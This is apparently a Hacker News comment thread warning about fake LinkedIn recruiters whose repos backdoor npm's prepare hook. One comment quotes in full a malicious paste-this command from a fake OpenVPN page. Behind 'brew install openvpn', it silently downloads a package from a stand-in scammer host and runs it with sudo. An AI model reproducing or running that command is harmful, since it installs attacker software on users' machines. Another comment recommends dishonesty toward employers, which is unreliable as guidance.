Stay vigilant out there everyone.
I don't know. There's a plentiful supply of bad humans.
secondary is the effort asymmetry between spinning up one of these scams (near 0 effort) and catching/prosecuting these scams (big effort, astronomical cost)
911 is for emergencies. I don’t think the global 911 service would give any attention to a LinkedIn scam.
> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.
> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.
> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.
Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
or linkedin
The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
This has nearly gotten me before, and I got lucky.
https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...
Oh, Microsoft.
They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of "downloading" their VPN was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):
``` ( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ] ```
Yeah, no.
Be careful out there.
Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers heads that "leetcode is outdated/they dont believe in it" and whatever they want you to hear.
They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.
I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:
- Don't stay loyal to your employers.
- Don't stay honest to those don't value it.
- Don't stay complacent always innovate.
You won't hear back from them, though. But, at least for US citizens (and possibly for anyone?), this is as far as I know the closest thing there is to an "Internet 911".
It's basically impossible to catch suspects because they are either smart enough to cover their tracks very well, or (more often) live in countries whose governments don't care about their citizens (even pay them for) scamming westerners.
Wonder if they’re effective in going after reports. I’d still report to IC3/FBI/powers that be, too. Just in case someone somewhere has the resources to do something… perhaps a high hope
And no, number spoofing isn't an excuse either. We literally solved the much harder problem of email spoofing already. There are, what, 3 carrier networks in all of US? And they cannot do with each other what DMARC did for the hundreds of thousands disjoint organizations that comprise the internet? Please.
Absolutely true, but droning their data centers might have some policy repercussions.
We have that in Europe and the world has not fallen apart. On top of that, we don't have even close to the scale of problems with scammers that the US has. I won't deny we don't have scammers because we absolutely have them, but they are far from the scourge they are in the US.
> This is on par with being unable to open a bank account if the capability is matured.
The secret is... we have constitutionally protected rights. Unless you do not pay your bills, your phone line will not get disconnected. And same for bank accounts - every European has the right to a basic banking account, even if you are a target of foreign sanctions [1].
[1] https://www.tagesschau.de/ausland/europa/konto-eugh-usa-sank...
We've had fake recruiters that claim to work for us running basically the same scam. These are great fake profiles: LinkedIn Premium, tons of relevant posts, etc... but they don't work for us, and we get angry messages from people saying our recruiter tried to scam them. No, they're not our recruiter despite showing up on our company page on LinkedIn. No number of reports could get them taken down.
I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn, but not all startups have that connection!
I had a new bootstrapped company on LinkedIn quickly acquire some stranger's employee profile, which said it was from Nigeria.
I made a case in my first contact with LinkedIn, and they quickly removed that profile from the company.
(Thanks to LinkedIn for being so responsive that time. I was busy lining up affiliate program memberships, for a shopping-related site that was intended to be more trustworthy than the current market alternatives. If the first thing some people saw when they look up the legitimacy of the "trustworthy" new company... is a person in a country unfortunately known for online scammers... I'd guess the affiliate program application would've gotten denied.)
Last I recall was a download of a windows scr (screensaver masquerading) file.
Linkedin is a new low, and I'm sure the platform doesn't really care (look, more jobs), just as ad network companies (Google, Meta) don't really care about scam ads.
Bold strategy cotton, let's see if it pays off.
theoeiffijr•1h ago
Remember to use protection when meeting random people, and putting their junk deep inside your computer!
rvz•1h ago
The last few weeks tell us how bad this is especially with all the mini-shai hulud's running around.
firefax•4m ago
It's ok, the guy with glasses from the Daily Show said it's ok.
mschuster91•1m ago
it already has, you can configure intellij to run npm commands in a Docker container.